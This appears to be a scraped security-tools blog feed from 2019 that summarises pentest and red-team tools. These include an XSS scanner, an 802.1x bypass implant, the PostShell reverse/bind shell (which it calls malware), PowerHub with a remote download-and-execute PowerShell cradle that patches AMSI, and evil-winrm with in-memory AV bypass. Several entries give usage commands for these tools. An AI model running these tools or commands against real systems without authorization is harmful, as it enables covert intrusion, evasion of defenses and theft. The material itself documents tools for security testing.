  • There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.



Free offer expires 10/15/19

Offered Free by: Wiley

Article link

Date of publish: Mon, 14 Oct 2019 14:22:00 +0000

TraXSS - Automated XSS Vulnerability Scanner


  • Automated Vulnerability Scanner for XSS 
  • Written in Python3 


Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:

brew install cask chromedriver

Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation

Run the command:

pip3 install -r requirements.txt

Running Traxss
Traxx can be started with the command:

python3 traxss.py

This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan with HTML

Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).

Full Scan w/o HTML

This scan will run the query scan only.

Fast Scan w/o HTML

This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML

This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Contributing

Thank you for your interest! All types of contributions are welcome.
  • Fork and clone this repository
  • Create your branch from the master branch
  • Please open your PR with the master branch as the base

Download TraXSS

Article link

Date of publish: Mon, 14 Oct 2019 08:28:00 +0000

Penta- Open Source All-in-one CLI To Automate Pentesting


Penta (PENTest + Automation tool) is Pentest automation tool using Python3.

Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv

Resolve python package dependency.

$ pipenv install

If you dislike pipenv..

$ pip install -r requirements.txt

Usage

$ pipenv run start <options>

If you dislike pipenv...

$ python penta/penta.py

Usage: List options

$ pipenv run start -h

usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool.

optional arguments:
  •   -h, --help      show this help message and exit
  •   -target TARGET  Specify target IP / domain
  •   -ports PORTS    Please, specify the target port(s) separated by comma.
  •                   Default: 21,22,25,80,110,443,8080
  •   -proxy PROXY    Proxy[IP:PORT]

Usage: Main menu

[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host

1. Port scanning
To check ports for a target. Log output supported.

2. Nmap
To check ports by additional means using nmap

3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.

4. Grab DNS server info
To show the info about DNS server.

Shodan host search To collect host service info from Shodan.
Request Shodan API key to enable the feature.

FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.

Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.

SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.

Download Now

Article link

Date of publish: Thu, 10 Oct 2019 18:57:00 +0000

Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass


Dolos Cloak- Automated 802.1x Bypass


Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.

The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.

How it Works

Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.

Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.

In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.

Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.

Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.

At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.

For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.

Installation and Usage

  • Perform default install of Kali ARM on Odroid C2. 
ssh root@169.254.44.44
  • Be sure to save this project to /root/tools/dolos_cloak
  • Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:
dhclient usbnet0
  • Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:
cd setup
./setup.sh
  • You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.
  • Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.
  • Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know for sure their values. The management_int, domain_name, and dns_server options are placeholders for now but will be usefull very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-middle attack has autoconfigured. You can also set up a cron job to send back shells.
  • Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)
  • Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.
  • PWN N00BZ, get $$$, have fun, hack the planet

Tips

  • Mod and run ./scripts/upgrade_to_vpn.sh to turn a stealthy Empire agent into a full blown VPN tunnel
  • Mod and run ./scripts/reverse_listener_setup.sh to set up a port for a reverse listener on the device.
  • Run ./scripts/responder_setup.sh to allow control of the protocols that we capture for responder. You shoud run responder on the bridge interface:
responder -I mibr
  • Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.
  • Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in ./logs/history.log so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.

Download Dolos Cloak

Article link

Date of publish: Mon, 23 Sep 2019 07:54:00 +0000

PostShell - Post Exploitation Bind/Backconnect Shell


PostShell - Post Exploitation Bind/Backconnect Shell


PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.

The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh This should create a binary called "stub" this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Receiving a Connection with Netcat


Recieving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

TODO:

Add domain resolution

Download PostShell

Disclaimer: These scripts for knowledge purpose only

Article link

Date of publish: Tue, 10 Sep 2019 06:31:00 +0000

Findomain- Fastest And Cross-platform Subdomain Enumerator

FinDomain- Fastest And Cross-platform Subdomain Enumerator.


Comparison
It comparison gives you a idea why you should use findomain instead of another enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:

Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB

Find-Domain used to calculate the time, is the time command in Linux.

You can see all the details of the tests in it link.


Enumeration ToolSearch TimeTotal Subdomains FoundCPU UsageRAM Usage
Findomainreal 0m38.701s5622Very LowVery Low
assetfinderreal 6m1.117s4630Very LowVery Low
Subl1st3rreal 7m14.996s996LowLow
Amass*real 29m20.301s332Very HighVery High

I can't wait to the amass test for finish, looks like it will never ends and additionally the resources usage is very high.

Note: The benchmark was made the 10/08/2019, since it point other software's can improve things and you will got different results.

Features

  • Discover sub-domains without brute-force, it uses Certificate Transparency Logs.
  • Discover sub-domains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Any platform.
  • Optional multiple API support.
  • Proxy support.

Note: the proxy support is just to proxify APIs requests, the actual implementation to discover IP address of sub-domains doesn't support proxyfing and it's made using the host network still if you use the -p option.

How it works?

It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find sub-domains and it method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

APIs that are using at the moment:
  • Certspotter: https://api.certspotter.com/
  • Crt.sh : https://crt.sh
  • Virustotal: https://www.virustotal.com/ui/domains/
  • Sublit3r: https://api.sublist3r.com/
  • Facebook: https://developers.facebook.com/docs/certificate-transparency

If you know other that should be added, open an issue.

Supported platforms in our binary releases

All supported platforms in the binarys that we give are 64 bits only and we don't have plans to add support for 32 bits binary releases, if you want to have support for 32 bits follow the documentation.
  • Linux
  • Windows
  • MacOS
  • ARM
  • Arch64 (Raspberry Pi)

Build for 32 bits or another platform

If you want to build the tool for your 32 bits system or another platform, follow it steps:

Note: You need to have rust, make and perl installed in your system first.

Using the Github source code:
  • Clone the repository or download the release source code.
  • Extract the release source code (only needed if you downloaded the compressed file).
  • Go to the folder where the source code is.
  • Execute cargo build --release
  • Now your binary is in target/release/findomain and you can use it.

Installation Android (Termux)

Install the Termux package, open it and follow it commands:

$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain

Installation in Linux using source code

If you want to install it, you can do that manually compiling the source or using the precompiled binary.

Manually: You need to have rust, make and perl installed in your system first.

$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain

Installation in Linux using compiled artifacts

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux

If you are using the BlackArch Linux distribution, you just need to use:

$ sudo pacman -S findomain


Installation ARM

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm
$ chmod +x findomain-arm
$ ./findomain-arm

Installation Aarch64 (Raspberry Pi)

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64

Installation Windows

Download the binary from 
https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe

Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.

Exec: findomain-windows in the CMD shell.

Installation MacOS

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms

Usage

You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

findomain 0.2.0
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
    findomain [FLAGS] [OPTIONS]

FLAGS:
    -a, --all-apis    Use all the available APIs to perform the search. It take more time but you will have a lot of
                      more results.
    -h, --help        Prints help information
    -i, --get-ip      Return the subdomain list with IP address if resolved.
    -V, --version     Prints version information

OPTIONS:
    -f, --file <file>        Sets the input file to use.
    -o, --output <output>    Write data to output file in the specified format. [possible values: txt, csv, json]
    -p, --proxy <proxy>      Use a proxy to make the requests to the APIs.
    -t, --target <target>    Target host


Examples

Make a simple search of subdomains and print the info in the screen:
findomain -t example.com

Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a

Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv

Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv

Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Make a search of subdomains using a proxy (http://127.0.0.1:8080 in it case, the rest of aguments continue working in the same way, you just need to add the -p flag to the before commands):
findomain -t example.com -p http://127.0.0.1:8080

Download FinDomain

Article link

Date of publish: Sat, 24 Aug 2019 08:56:00 +0000

Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints


Burp Scope Monitor Extension

A Burp Suite Extension to monitor and keep track of tested endpoints.


Main Features


  • Simple, easy way to keep track of unique endpoints when testing an application
  • Mark individual endpoints as analyzed or not
  • Instantly understand when a new endpoint, not tested is requested
  • Accessible from Proxy tab (right click, mark request as analyzed/not)
  • Send to Repeater
  • Enforcement of Burp's in scope rules
  • Import/Export state file directly to a CSV file for
  • Autosave option


Installation


  1. Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
  2. git clone git@github.com:Regala/burp-scope-monitor.git
  3. Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py


Documentation

Most of the options available in General or Import tabs are auto-explanatory.


  • "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
  • "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.
  • "Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.
  • "Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).

Future Development


  • Keep track of parameters observed in all requests
  • Highlight when a new parameter was used in an already observed/analyzed endpoint
  • Export to spreadsheet / Google Sheets
  • Adding notes to the endpoint

Implementation

The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.

To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.

You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.

Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.

Download Burp Scope Monitor 

Article link

Date of publish: Wed, 21 Aug 2019 11:45:00 +0000

Slurp- To Security Audits of S3 Buckets Enumerator


Slurp- Blackbox/Whitebox S3 Bucket Enumerator

To Evaluate the security of S3 buckets


Overview

  • Credit to all the vendor packages to develop Slurp possible.
  • Slurp is for pen-testers and security professionals to perform audits of s3 buckets.

Features

  • Scan via domain(s); you can target a single domain or a list of domains
  • Scan via keyword(s); you can target a single keyword or a list of keywords
  • Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
  • Colorized output for visual grep
  • Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
  • Punycode support for internationalized domains
  • Strong copyleft license (GPLv3)

Modes

There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.

Blackbox (external)

In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.

Domain


Keywords


Whitebox (internal)

In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.

Your credentials should be in ~/.aws/credentials.

Internal



Usage

  • slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
  • slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
  • slurp internal performs an internal scan using the AWS API.

Installation

This project uses vgo; you can clone and go build or download from Releases section.

Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.

Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.

Download Slurp

Article link

Date of publish: Wed, 07 Aug 2019 21:47:00 +0000

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection


PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.


During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json


Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub

Article link

Date of publish: Wed, 07 Aug 2019 21:15:00 +0000

Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap


Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.



With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.


PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.

Features:

  • Transparent network bridge.
  • Silent : No ARP, multicast, broadcast.
  • 802.1x passthrough.
  • Automatic configuration:
Capture traffic exiting the network (the destination is non RFC1918), source IP and MAC is our victim, destination MAC is our gateway,
SNAT bridge traffic to the victim MAC and IP address,
set the router default gateway to the MAC of the gateway detected just before.

  • Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
  • Learns the DNS server from traffic and modifies the one on the router so that it's the same.
  • Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
  • Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
  • You can talk to the victim machine (using the gateway IP).

Setup

PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).

If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
  • Install a snapshot build, for the GL.iNet GL-AR150
  • Update the OpenWrt package list
opkg update
  • Install PhanTap package:
opkg install phantap phantap-learn
  • Configure the Wifi and start administering the router through it.
  • Either reboot the device, or run /etc/init.d/phantap setup.
  • Get the interface names from that device:
# uci show network | grep ifname
network.loopback.ifname='lo'
network.lan.ifname='eth1'
network.wan.ifname='eth0'
network.wan6.ifname='eth0'

In this example we are using a GL-AR150, which only has 2 interfaces.

Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
  • uci delete network.lan.ifname
  • uci delete network.wan.ifname
  • uci delete network.wan6.ifname
  • uci set network.phantap.ifname='eth0 eth1'
  • uci commit network
  • /etc/init.d/network reload

Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.

You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.

You can also add a command to be ran when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart VPN service).

You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).

Limitations or how it can be detected :

  • The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.
  • The network port will stay up, switch side, when the victim device is disconnected/shutdown.
  • There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).
  • Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).

Roadmap :

  • Add logic to restart the detection when the links go up/down.
  • Add DHCP packet analysis for dynamic reconfiguration.
  • Add IPv6 support.
  • Test limitations of devices that have switches(swconfig) instead of separate interfaces.

Article link

Date of publish: Wed, 07 Aug 2019 20:47:00 +0000

CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible


CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible 


Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.

Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
  • Misconfigured DNS scan using DNSDumpster.com.
  • Scan the Crimeflare.com database.
  • Bruteforce scan over 2500 subdomains.

Cloudcheck create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.

If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. (Later automating this process)

Download Cloudcheck

Article link

Date of publish: Fri, 02 Aug 2019 17:03:00 +0000

The Ultimate WinRM Shell For Penetration Testing


This shell is the ultimate WinRM shell for hacking/pentesting.


WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 


A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.

The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features

  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) compiled exe files bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help

Usage: 
evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]

  • -i, --ip IP                Remote host IP or hostname (required)
  • -P, --port PORT                Remote host port (default 5985)
  • -u, --user USER                 Username (required)
  • -p, --password PASS       Password
  • -s, --scripts PS_SCRIPTS_PATH    Powershell scripts path (required)
  • -e, --executables EXES_PATH        C# executables path (required)
  • -U, --url URL                    Remote url endpoint (default /wsman)
  • -V, --version                    Show version
  • -h, --help                           Display this help message


Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.

~$ sudo gem install winrm winrm-fs colorize stringio

Installation 

Step 1. Clone the repo: 

git clone https://github.com/Hackplayers/evil-winrm.git

Step 2. Ready. Just launch it!

 ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.

To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem

Step 1. Install it: 

gem install evil-winrm

Step 2. Ready. Just launch it!

~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'


Documentation

Basic commands

  • upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
  • usage: upload local_path remote_path
  • download: it is not needed to set local_path if the remote file is in the current directory.
  • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts

To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.


Advanced commands

Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.



l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.




Extra features

To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false


Disclaimer 

Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Download Winrm

Article link

Date of publish: Wed, 31 Jul 2019 12:21:00 +0000

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.


usbrip (derived from "USB Ripper", not "USB R.I.P." astonished) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.

usbrip is a small piece of software written in pure Python 3 (using some external modules though, see Dependencies/PIP) which parses Linux log files (/var/log/syslog* or /var/log/messages* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).

Besides, it also can:
  • export gathered information as a JSON dump (and open such dumps, of course);
  • generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);
  • search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;
  • When installed with -s flag create crypted storages (7zip archives) to automatically backup and accumulate USB events with the help of crontab scheduler;
  • search additional details about a specific USB device based on its VID and/or PID.

Quick Start

usbrip is available for download and installation at PyPI:

$ pip3 install usbrip



Git Clone

For simplicity, lets agree that all the commands where ~/usbrip$ prefix is appeared are executed in the ~/usbrip directory which is created as a result of git clone:

~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip
~/usbrip$

Dependencies

usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with syslog-ng or rsyslog, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.

DEB Packages

  • python3.6 (or newer) interpreter
  • python3-venv
  • p7zip-full (used by storages module)
  • ~$ sudo apt install -y python3-venv p7zip-full

PIP Packages

usbrip makes use of the following external modules:
  • terminaltables
  • termcolor

To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install -r requirements.txt

Or let the pipenv one-liner do all the dirty work for you:

~/usbrip$ pipenv install && pipenv shell

After that you can run usbrip portably:

(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h

Installation

